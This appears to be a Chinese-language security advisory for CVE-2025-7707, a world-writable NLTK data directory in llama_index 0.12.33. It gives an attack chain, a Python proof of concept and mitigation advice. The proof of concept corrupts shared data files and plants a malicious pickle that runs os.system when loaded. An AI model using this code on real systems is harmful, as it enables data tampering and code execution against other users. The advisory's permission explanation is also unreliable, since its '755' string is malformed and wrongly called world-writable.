CVE-2025-7707 llama_index NLTK数据目录权限不当导致本地提权与数据篡改

漏洞信息

漏洞编号

CVE-2025-7707

漏洞类型

不安全权限配置/本地权限提升/数据篡改

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

run-llama/llama_index

漏洞概述

CVE-2025-7707是llama_index库0.12.33版本中存在的一个高危安全漏洞。该漏洞源于llama_index在初始化NLTK（Natural Language Toolkit）组件时，默认将NLTK数据目录设置为代码库的一个子目录，而非用户专属目录。在多用户操作系统环境（如Linux多用户服务器或共享开发环境）中，该子目录的权限配置为全局可写（world-writable），这意味着任何本地用户都可以读取、修改、删除或替换该目录下的NLTK数据文件。

该漏洞由安全研究员[email protected]通过huntr漏洞赏金平台发现并披露，CVSS 3.1评分为7.8分，属于高危级别。漏洞的攻击向量为本地（AV:L），攻击者只需具备低权限（PR:L），无需用户交互（UI:N）即可实施攻击。一旦被利用，攻击者可以篡改NLTK数据文件，导致拒绝服务、数据篡改，甚至在特定场景下实现权限提升。例如，攻击者可以将恶意的NLTK数据文件（如恶意分词模型或语料库）植入共享目录，当其他用户或特权进程使用llama_index时，将加载并执行恶意数据，从而导致代码执行或敏感信息泄露。

该漏洞的根本问题在于使用了共享缓存目录而非用户隔离的缓存目录（如~/.cache/nltk_data），违反了最小权限原则。llama_index作为一款广泛使用的LLM应用开发框架，其安全性直接影响到大量下游应用，因此该漏洞的影响范围不容忽视。官方已通过提交98816394d57c7f53f847ed7b60725e69d0e7aae4进行修复，建议用户尽快升级到修复版本。

技术细节

漏洞的技术原理在于llama_index库在版本0.12.33中对NLTK数据路径的硬编码处理。NLTK是Python自然语言处理的核心库，其数据文件（如分词器、语料库、训练模型等）默认下载到nltk.data.path中指定的目录。llama_index在集成NLTK功能时，将NLTK数据搜索路径设置为了代码库内的一个相对路径子目录（如./nltk_data或类似路径），而非标准的用户级缓存目录（如~/.local/share/nltk_data或~/nltk_data）。

在多用户Linux系统中，如果该子目录以默认权限创建（即umask为022），则目录权限为drwxr-xr-x-r（755）或更宽松的drwxrwxrwx（777），使得所有本地用户均具备写权限。攻击者利用方式如下：

1. 攻击者以普通用户身份登录多用户系统，定位llama_index安装目录下的NLTK数据子目录。
2. 攻击者利用写权限，在该目录中植入恶意的NLTK数据文件，例如恶意的pickle序列化文件（Python pickle反序列化漏洞可导致任意代码执行）或被篡改的语料库文件。
3. 当系统中的其他用户（特别是特权用户或运行llama_index应用的服务进程）使用llama_index进行文本处理时，NLTK会自动从该共享目录加载数据文件。
4. 恶意文件被加载后，攻击者可以实现拒绝服务（通过删除或损坏关键数据文件导致程序崩溃）、数据篡改（修改分词结果影响下游AI应用的输出）或权限提升（通过pickle反序列化等机制执行任意代码）。

修复方案是将NLTK数据目录设置为用户专属目录，或在创建目录时设置严格的权限（如0700），确保只有当前用户能够读写。

攻击链分析

STEP 1

步骤1：信息收集

攻击者在多用户系统中定位llama_index的安装目录，识别其中全局可写的NLTK数据子目录（如./nltk_data）。通过检查目录权限位（mode & 0o002）确认目录对其他用户可写。

STEP 2

步骤2：权限验证

攻击者以低权限用户身份验证对目标目录的写权限。确认可以创建、修改和删除目录中的文件，无需提升权限。

STEP 3

步骤3：恶意载荷植入

攻击者向共享NLTK数据目录植入恶意文件。可以是损坏的数据文件（导致拒绝服务），也可以是恶意的pickle序列化文件（利用Python反序列化漏洞实现代码执行）。

STEP 4

步骤4：触发加载

当系统中的其他用户或特权服务进程使用llama_index进行文本处理时，NLTK会自动从共享目录加载数据文件。恶意载荷在加载过程中被触发执行。

STEP 5

步骤5：权限提升或数据破坏

若加载恶意pickle文件，攻击者可在特权进程的上下文中执行任意代码，实现权限提升。若仅损坏数据文件，则导致拒绝服务或AI应用输出被篡改，影响下游业务系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-7707 PoC - llama_index NLTK Data Directory Tampering
# This PoC demonstrates how a local attacker can exploit the world-writable
# NLTK data directory in llama_index <= 0.12.33 to tamper with shared data files.

import os
import sys
import nltk

# Step 1: Locate the vulnerable llama_index NLTK data directory
# The vulnerable version sets the NLTK data path to a subdirectory within
# the llama_index codebase (e.g., ./nltk_data) instead of a user-specific path.
def find_vulnerable_nltk_dir():
    """Find the world-writable NLTK data directory used by llama_index."""
    import llama_index
    pkg_path = os.path.dirname(llama_index.__file__)
    candidate_dirs = [
        os.path.join(pkg_path, "nltk_data"),
        os.path.join(pkg_path, "data", "nltk_data"),
    ]
    for d in candidate_dirs:
        if os.path.exists(d):
            # Check if directory is world-writable
            mode = os.stat(d).st_mode
            if mode & 0o002:  # world-writable bit
                print(f"[+] Vulnerable world-writable directory found: {d}")
                return d
    return None

# Step 2: Demonstrate data tampering (DoS / integrity attack)
def tamper_nltk_data(target_dir):
    """Overwrite or corrupt NLTK data files in the shared directory."""
    for root, dirs, files in os.walk(target_dir):
        for f in files:
            filepath = os.path.join(root, f)
            try:
                # Corrupt the data file by overwriting with garbage
                with open(filepath, "wb") as fp:
                    fp.write(b"\x00" * 1024)
                print(f"[!] Corrupted: {filepath}")
            except PermissionError:
                print(f"[-] Permission denied: {filepath}")

# Step 3: Plant malicious pickle payload (potential RCE via deserialization)
def plant_malicious_pickle(target_dir):
    """Plant a malicious pickle file that executes code upon loading."""
    import pickle
    class MaliciousPayload:
        def __reduce__(self):
            # Replace with actual malicious command in real exploit
            return (os.system, ("echo 'PWNED by CVE-2025-7707'",))

    payload_path = os.path.join(target_dir, "tokenizers", "punkt", "malicious.pickle")
    os.makedirs(os.path.dirname(payload_path), exist_ok=True)
    with open(payload_path, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    print(f"[!] Malicious pickle planted at: {payload_path}")

# Step 4: Verify the NLTK search path includes the vulnerable directory
def check_nltk_search_path():
    """Verify that the vulnerable directory is in NLTK's search path."""
    print("[*] Current NLTK data search paths:")
    for p in nltk.data.path:
        print(f"    - {p}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-7707 - llama_index NLTK Directory Tampering PoC")
    print("=" * 60)

    check_nltk_search_path()

    vuln_dir = find_vulnerable_nltk_dir()
    if vuln_dir:
        print(f"\n[*] Exploiting vulnerable directory: {vuln_dir}")
        # Uncomment the desired attack:
        # tamper_nltk_data(vuln_dir)      # DoS / data corruption
        # plant_malicious_pickle(vuln_dir) # Potential RCE
    else:
        print("[-] No vulnerable directory found. System may be patched.")

影响范围

run-llama/llama_index == 0.12.33

防御指南

临时缓解措施

在无法立即升级的情况下，建议手动将llama_index的NLTK数据目录权限修改为仅当前用户可读写（chmod 700），或将NLTK_DATA_PATH环境变量指向用户专属目录。同时，在多用户系统中应限制普通用户对llama_index安装目录的写权限，并监控NLTK数据目录中的异常文件变更。